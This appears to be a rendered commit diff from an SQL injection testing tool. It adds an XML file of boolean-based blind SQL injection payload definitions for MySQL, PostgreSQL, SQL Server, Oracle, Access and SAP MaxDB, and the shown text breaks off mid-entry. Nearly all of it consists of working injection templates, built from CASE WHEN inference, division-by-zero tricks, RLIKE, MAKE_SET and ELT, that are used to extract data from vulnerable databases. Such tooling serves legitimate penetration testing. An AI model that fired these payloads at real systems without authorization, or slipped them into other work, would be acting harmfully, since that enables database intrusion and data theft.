			
		
		
		
	split payloads in different files
		
							parent
							
								
									daa8e0d8c5
								
							
						
					
					
						commit
						6cc092b926
					
				
										
											
											
										
									
								
							
							
								
								
									
										671
									
								
								xml/payloads/01_boolean_blind.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										671
									
								
								xml/payloads/01_boolean_blind.xml
									
									
									
									
									
										Normal file
									
								
							| 
						 | 
				
			
			@ -0,0 +1,671 @@
 | 
			
		|||
<?xml version="1.0" encoding="UTF-8"?>
 | 
			
		||||
 | 
			
		||||
<!--
 | 
			
		||||
Tag: <test>
 | 
			
		||||
    SQL injection test definition.
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <title>
 | 
			
		||||
        Title of the test.
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <stype>
 | 
			
		||||
        SQL injection family type.
 | 
			
		||||
 | 
			
		||||
        Valid values:
 | 
			
		||||
            1: Boolean-based blind SQL injection
 | 
			
		||||
            2: Error-based queries SQL injection
 | 
			
		||||
            3: UNION query SQL injection
 | 
			
		||||
            4: Stacked queries SQL injection
 | 
			
		||||
            5: Time-based blind SQL injection
 | 
			
		||||
            6: Inline queries SQL injection
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <level>
 | 
			
		||||
        From which level check for this test.
 | 
			
		||||
 | 
			
		||||
        Valid values:
 | 
			
		||||
            1: Always (<100 requests)
 | 
			
		||||
            2: Try a bit harder (100-200 requests)
 | 
			
		||||
            3: Good number of requests (200-500 requests)
 | 
			
		||||
            4: Extensive test (500-1000 requests)
 | 
			
		||||
            5: You have plenty of time (>1000 requests)
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <risk>
 | 
			
		||||
        Likelihood of a payload to damage the data integrity.
 | 
			
		||||
 | 
			
		||||
        Valid values:
 | 
			
		||||
            0: No risk
 | 
			
		||||
            1: Low risk
 | 
			
		||||
            2: Medium risk
 | 
			
		||||
            3: High risk
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <clause>
 | 
			
		||||
        In which clause the payload can work.
 | 
			
		||||
 | 
			
		||||
        NOTE: for instance, there are some payload that do not have to be
 | 
			
		||||
        tested as soon as it has been identified whether or not the
 | 
			
		||||
        injection is within a WHERE clause condition.
 | 
			
		||||
 | 
			
		||||
        Valid values:
 | 
			
		||||
            0: Always
 | 
			
		||||
            1: WHERE / HAVING
 | 
			
		||||
            2: GROUP BY
 | 
			
		||||
            3: ORDER BY
 | 
			
		||||
            4: LIMIT
 | 
			
		||||
            5: OFFSET
 | 
			
		||||
            6: TOP
 | 
			
		||||
            7: Table name
 | 
			
		||||
            8: Column name
 | 
			
		||||
 | 
			
		||||
        A comma separated list of these values is also possible.
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <where>
 | 
			
		||||
        Where to add our '<prefix> <payload><comment> <suffix>' string.
 | 
			
		||||
 | 
			
		||||
        Valid values:
 | 
			
		||||
            1: Append the string to the parameter original value
 | 
			
		||||
            2: Replace the parameter original value with a negative random
 | 
			
		||||
               integer value and append our string
 | 
			
		||||
            3: Replace the parameter original value with our string
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <vector>
 | 
			
		||||
        The payload that will be used to exploit the injection point.
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <request>
 | 
			
		||||
        What to inject for this test.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <payload>
 | 
			
		||||
            The payload to test for.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <comment>
 | 
			
		||||
            Comment to append to the payload, before the suffix.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <char>
 | 
			
		||||
            Character to use to bruteforce number of columns in UNION
 | 
			
		||||
            query SQL injection tests.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <columns>
 | 
			
		||||
            Range of columns to test for in UNION query SQL injection
 | 
			
		||||
            tests.
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <response>
 | 
			
		||||
        How to identify if the injected payload succeeded.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <comparison>
 | 
			
		||||
            Perform a request with this string as the payload and compare
 | 
			
		||||
            the response with the <payload> response. Apply the comparison
 | 
			
		||||
            algorithm.
 | 
			
		||||
 | 
			
		||||
            NOTE: useful to test for boolean-based blind SQL injections.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <grep>
 | 
			
		||||
            Regular expression to grep for in the response body.
 | 
			
		||||
 | 
			
		||||
            NOTE: useful to test for error-based SQL injection.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <time>
 | 
			
		||||
            Time in seconds to wait before the response is returned.
 | 
			
		||||
 | 
			
		||||
            NOTE: useful to test for time-based blind and stacked queries
 | 
			
		||||
            SQL injections.
 | 
			
		||||
 | 
			
		||||
        Sub-tag: <union>
 | 
			
		||||
            Calls unionTest() function.
 | 
			
		||||
 | 
			
		||||
            NOTE: useful to test for UNION query (inband) SQL injection.
 | 
			
		||||
 | 
			
		||||
    Sub-tag: <details>
 | 
			
		||||
        Which details can be infered if the payload succeed.
 | 
			
		||||
 | 
			
		||||
        Sub-tags: <dbms>
 | 
			
		||||
            What is the database management system (e.g. MySQL).
 | 
			
		||||
 | 
			
		||||
        Sub-tags: <dbms_version>
 | 
			
		||||
            What is the database management system version (e.g. 5.0.51).
 | 
			
		||||
 | 
			
		||||
        Sub-tags: <os>
 | 
			
		||||
            What is the database management system underlying operating
 | 
			
		||||
            system.
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title></title>
 | 
			
		||||
        <stype></stype>
 | 
			
		||||
        <level></level>
 | 
			
		||||
        <risk></risk>
 | 
			
		||||
        <clause></clause>
 | 
			
		||||
        <where></where>
 | 
			
		||||
        <vector></vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload></payload>
 | 
			
		||||
            <comment></comment>
 | 
			
		||||
            <char></char>
 | 
			
		||||
            <columns></columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison></comparison>
 | 
			
		||||
            <grep></grep>
 | 
			
		||||
            <time></time>
 | 
			
		||||
            <union></union>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms></dbms>
 | 
			
		||||
            <dbms_version></dbms_version>
 | 
			
		||||
            <os></os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
-->
 | 
			
		||||
 | 
			
		||||
<root>
 | 
			
		||||
    <!-- Boolean-based blind tests - WHERE/HAVING clause -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>AND boolean-based blind - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [INFERENCE]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=[RANDNUM]</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [INFERENCE]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=[RANDNUM]</payload>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [INFERENCE]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=[RANDNUM]</payload>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>OR boolean-based blind - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>3</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR ([INFERENCE])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>3</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR ([INFERENCE])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>3</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR ([INFERENCE])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
 | 
			
		||||
 | 
			
		||||
    <!-- Boolean-based blind tests - Parameter replace -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>ELT([INFERENCE],[ORIGVALUE])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>([INFERENCE])*[ORIGVALUE]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.0 boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL < 5.0 boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft Access</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>SAP MaxDB</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- End of boolean-based blind tests - Parameter replace -->
 | 
			
		||||
 | 
			
		||||
    <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
